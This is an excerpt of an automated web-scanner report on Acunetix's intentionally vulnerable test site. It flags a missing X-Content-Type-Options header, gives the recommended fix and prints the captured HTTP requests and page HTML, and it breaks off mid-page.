          	background: url(images/background.gif) #e6dccf fixed repeat-y center top;
          	padding-bottom: 0px;
          	margin: 0px;
          	font: small tahoma, "Bitstream Vera Sans" , "Trebuchet MS" , "Lucida Grande" , lucida, helvetica, sans-serif;
          	padding-top: 0px;
          	list-style-type: square;
          }
          A.menu
          {
          	padding-right: 10px;
          	padding-left: 10px;
          	color: #806640;
          	text-decoration: none;
          	background-color: #e6dccf;
          }
          A.menu:hover
          {
          	padding-right: 10px;
          	padding-left: 10px;
          	color: #e6dccf;
          	text-decoration: none;
          	background-color: #BF8630;
          }
          A.NewsOperation
          {
          	font-size: xx-small;
          	margin-left: 5px;
          	color: #BF8630;
          	margin-right: 5px;
          	text-decoration: none;
          }
          A.NewsOperation:hover
          {
          	font-size: xx-small;
          	margin-left: 5px;
          	color: #E6B873;
          	margin-right: 5px;
          	text-decoration: none;
          }
          .Framed
          {
          	border: #E6DCCF 1px solid;
          }
          .FramedForm
          {
          	border-right: #806640 1px solid;
          	border-top: #806640 1px solid;
          	border-left: #806640 1px solid;
          	border-bottom: #806640 1px solid;
          	background-color: #e6dccf;
          }
          .MenuBar
          {
          	border-top: #806640 1px solid;
          	border-bottom: #806640 1px solid;
          	background-color: #e6dccf;
          }
          .Calendar
          {
          	border-right: #e6b873 1px solid;
          	border-top: #e6b873 1px solid;
          	border-left: #e6b873 1px solid;
          	border-bottom: #e6b873 1px solid;
          }
          INPUT
          {
          	border: #806640 1px solid;
          }
          INPUT.classic
          {
          	border: none;
          }
          TEXTAREA
          {
          	border: #807940 1px solid;
          }
          INPUT.PostNews
          {
          	border: #807940 1px solid;
          	width: 500px;
          }
          INPUT.Login
          {
          	border: #807940 1px solid;
          	width: 250px;
          }
          TEXTAREA.PostNews
          {
          	border: #807940 1px solid;
          	width: 500px;
          	height: 300px;
          }
          TEXTAREA.CommentTA
          {
          	border: #807940 1px solid;
          	width: 450px;
          	height: 100px;
          }
          .NewsDate
          {
          	border-top: #e6b873 2px solid;
          	font-size: xx-small;
          	border-bottom: #e6b873 1px solid;
          }
          
          .NewsTitle
          {
          	font-weight: bolder;
          	margin-bottom: 5px;
          	text-transform: capitalize;
          	padding-top: 2px;
          }
          .NewsShort
          {
          	padding-left: 5px;
          	margin-bottom: 10px;
          }
          .NewsLong
          {
          	padding-left: 5px;
          	margin-bottom: 10px;
          	border-bottom: #e6b873 1px solid;
          }
          .CommentText
          {
          	margin-top: 10px;
          	margin-bottom: 5px;
          }
          .CommentAuthor
          {
          	font-size: xx-small;
          	margin-bottom: 10px;
          }
          .Comment
          {
          	clear: both;
          	border-right: #806640 1px solid;
          	padding-right: 5px;
          	padding-left: 5px;
          	float: none;
          	padding-bottom: 5px;
          	border-left: #806640 1px solid;
          	width: 500px;
          	padding-top: 5px;
          }
          .Calendar
          {
          	border: solid 1px #E6B873;
          }
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        25. POST http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/about.aspx
          Content-Length: 1027
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1027 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t&__VIEWSTATEGENERATOR=E809BCA5&__EVENTVALIDATION=%2FwEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ%2F2grLtTL%2BjO092JULZB%2B%2Bks9UGJw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        26. POST http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (388 bytes)
          POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com
          Content-Length: 1025
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1025 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a 